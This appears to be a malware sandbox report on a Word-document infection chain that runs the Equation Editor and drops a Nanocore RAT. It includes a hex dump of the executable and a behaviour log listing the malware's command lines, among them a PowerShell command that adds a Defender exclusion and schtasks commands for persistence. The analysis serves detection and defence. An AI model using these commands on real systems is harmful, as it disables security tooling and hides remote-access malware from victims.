00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 07 00 00 02 00 00 00 36 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 4a 07 00 00 00 00 00 48 00 00 00 02 00 05 00 60 b5 06 00 dc 94 00 00 03 00 00 00 30 01 00 06 28 f4 00 00 38 c1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 0e 00 00 00 12 00 00 00 13 00 00 00 02 00 00 00 0e 00 00 00 11 00 00 00 13 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 03 00 07 00 00 00 01 00 00 11 02 7b 0c 00 00 04 2a 00 13 30 04 00 08 00 00 00 01 00 00 11 02 03 7d 0c 00 00 04 2a 13 30 03 00 4e 00 00 00 02 00 00 11 00 20 3d a8 47 f7 20 1b ea ff b9 61 25 0b 1a 5e 45 04 00 00 00 27 00 00 00 18 00 00 00 02 00 00 00 dc ff ff ff 2b 25 02 7b 05 00 00 04 0a 07 20 db 2a cb 8e 5a 20 08 c0 84 ef 61 2b c9 07 20 10 a0 54 ba 5a 20 8f 9e c1 02 61 2b ba 06 2a 00 00 13 30 03 00 3b 00 00 00 02 00 00 11 00 20 54 51 73 d5 20 63 5d 69 db 61 25 0b 19 5e 45 03 00 00 00 e0 ff ff ff 18 00 00 00 02 00 00 00 2b 16 02 7b 0d 00 00 04 0a 07 20 76 01 5f ad 5a 20 77 c1 cc c3 61 2b cd 06 2a 00 13 30 04 00 09 00 00 00 01 00 00 11 00 02 03 7d 0d 00 00 04 2a 00 00 00 13 30 03 00 3b 00 00 00 03 00 00 11 00 02 7b 0a 00 00 04 0a 20 20 9d ef 9f 20 9a 47 4a 91 61 25 0b 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00 11 00 00 00 2b 0f 07 20 78 7e d8 e6 5a 20 d9 88 8c e4 61 2b d4 06 2a 00 13 30 05 00 d2 01 00 00 01 00 00 11 02 16 7d 04 00 00 04 02 16 7d 05 00 00 04 02 28 21 00 00 0a 20 fd d8 24 0b 20 9d 31 8f 57 61 25 0a 1f 0f 5e 45 0f 00 00 00 2d 01 00 00 14 01 00 00 bf 00 00 00 6c 01 00 00 05 00 00 00 e2 00 00 00 8c 00 00 00 59 01 00 00 a5 00 00 00 22 00 00 00 af ff ff ff 46 01 00 00 4b 00 00 00 69 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{a0,J `@ @<JO` H.text* , `.rsrc `.@@.reloc6@BpJH`0(80*0{*0}*0N =G a%^E'+%{ *Z a+ TZ a+*0; TQs c]ia%^E+{ v_Z wa+*0}*0;{ GJa%^E+ x~Z a+*0}}(! $ 1Wa%^E-lY"FKi


                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:15:30:18
                Start date:24/01/2022
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Imagebase:0x13f4f0000
                File size:1423704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:15:30:23
                Start date:24/01/2022
                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Imagebase:0x400000
                File size:543304 bytes
                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:15:30:24
                Start date:24/01/2022
                Path:C:\Users\user\AppData\Roaming\plugmancdht5461.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\plugmancdht5461.exe
                Imagebase:0xfc0000
                File size:473088 bytes
                MD5 hash:7031570AA150B893F68A32900327B2AE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 40%, ReversingLabs
                Reputation:low

                General

                Start time:15:30:27
                Start date:24/01/2022
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
                Imagebase:0x220f0000
                File size:452608 bytes
                MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Start time:15:30:27
                Start date:24/01/2022
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp
                Imagebase:0x660000
                File size:179712 bytes
                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:15:30:29
                Start date:24/01/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                Imagebase:0x11f0000
                File size:45216 bytes
                MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                General

                Start time:15:30:32
                Start date:24/01/2022
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp
                Imagebase:0x2a0000
                File size:179712 bytes
                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:15:30:35
                Start date:24/01/2022
                Path:C:\Windows\System32\taskeng.exe
                Wow64 process (32bit):false
                Commandline:taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                Imagebase:0xffdd0000
                File size:464384 bytes
                MD5 hash:65EA57712340C09B1B0C427B4848AE05
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:15:30:35
                Start date:24/01/2022
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp
                Imagebase:0xd70000
                File size:179712 bytes
                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:15:30:36
                Start date:24/01/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
                Imagebase:0x11f0000
                File size:45216 bytes
                MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET

                General

                Start time:15:30:37
                Start date:24/01/2022
                Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0
                Imagebase:0x1180000
                File size:45216 bytes
                MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Antivirus matches:
                • Detection: 0%, Metadefender, Browse
                • Detection: 0%, ReversingLabs

                General

                Start time:15:30:44
                Start date:24/01/2022
                Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\SMTP Service\smtpsvc.exe"
                Imagebase:0x1390000
                File size:45216 bytes
                MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET

                Disassembly

                No disassembly